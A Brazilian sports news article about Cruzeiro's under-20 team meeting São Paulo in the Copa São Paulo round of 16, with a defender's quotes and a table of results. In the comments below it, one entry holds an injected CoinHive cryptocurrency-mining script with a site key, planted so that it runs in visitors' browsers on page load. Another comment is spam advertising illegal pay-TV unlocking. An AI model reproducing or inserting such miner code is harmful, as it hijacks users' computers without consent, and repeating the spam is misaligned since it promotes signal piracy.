logo

15/1/2018 13:24

Único mineiro vivo, Cruzeiro enfrenta o São Paulo pela Copinha

Único mineiro vivo, Cruzeiro enfrenta o São Paulo pela Copinha

Fotos: Gustavo Aleixo/Cruzeiro

De Ribeirão Preto-SP

Gustavo Aleixo

Único clube mineiro que ainda sonha com o título da Copa São Paulo 2018, o Cruzeiro terá pela frente um clássico nacional nesta segunda-feira. Pelas oitavas de final, o Maior de Minas encara o São Paulo, às 20h, em Ribeirão Preto, num encontro entre duas das melhores escolas de formação de atletas do Brasil.



No ano passado, as equipes se enfrentaram duas vezes pelo Campeonato Brasileiro Sub-20, vencido pelo Cruzeiro, com uma vitória para cada lado, sendo que, no triunfo são-paulino, o time celeste jogou com uma equipe alternativa.

“A gente sabe da qualidade do time deles. Uma equipe tecnicamente muito boa, mas estamos numa fase da Copinha que os dois clubes precisavam das vitórias e, por isso, ambos vão buscar o gol o tempo todo. Respeitamos a forma como eles chegaram até as oitavas de final, mas a gente que vencer e vamos para cima também”, destacou o zagueiro Gustavo Rissi.

Para o clássico no estádio Santa Cruz, o time cruzeirense terá que conviver com a presença da torcida rival, o que não preocupa Gustavo Rissi. Para o camisa 4, a equipe está preparada para fazer um grande jogo e mostrar toda a sua qualidade num gramado que aparenta estar em boas condições.

“Acho que, psicologicamente, a equipe toda está bem preparada para isso. O torcedor não entra em campo, e a gente sabe disso. Vamos para cima, independentemente da situação”, avaliou.

“Acredito que o campo seja bom. Pegamos só campos ruins na competição toda e, agora, vamos poder mostrar o que sabemos. Até agora, só trabalhamos em campos ruins e, pegar um gramado bom, vai beneficiar nosso time, que é bastante técnico”, acrescentou.

Com cinco jogos disputados até então, o Maior de Minas chega mais calejado, após passar por duas disputas por pênaltis na segunda e terceira fase, contra o Rio Branco-SP e Paraná. Focado na vitória no tempo normal, Gustavo Rissi garante que a equipe celeste está pronta para todos os contextos de jogo.

“Vamos fazer o máximo, mas pênalti é consequência. A gente não entra em campo pensando nos pênaltis. Queremos vencer sempre, mas faz parte. Caso tenhamos uma nova disputa por pênaltis, vamos estar preparados”, afirmou.

Gustavo Rissi vê equipe bem preparada em todos os aspectos

Tabela de jogos do Cruzeiro na Copa São Paulo

Grupo 12
04/01 – Cruzeiro 2 x 1 Batatais – gols: Vitinho e Vander
07/01 – Nova Iguaçu 1 x 0 Cruzeiro
09/01 – Inter de Bebedouro 1 x 3 Cruzeiro – gols: Alesson, Marcelo e Lucas Soares

Segunda Fase
11/01 – Cruzeiro 1 (3) x (1) 1 Rio Branco-SP – gol: Vitinho

Terceira fase
13/01 – Cruzeiro 1 (6) x (5) 1 Paraná – gol: Alesson

Oitavas de final
15/01 – Cruzeiro x São Paulo

Artilharia celeste
2 gols: Vitinho e Alesson
1 gol: Marcelo, Lucas Soares e Vander

270 visitas - Fonte: Site Oficial


tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Rafael Pontes     

pra frente < src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Campeonato Brasileiro

Dom - 16:00 - Vila Belmiro - PPV
Santos
Cruzeiro

Último jogo - Libertadores

Ter - 21:30 - Mineirão
Cruzeiro
2 1
Racing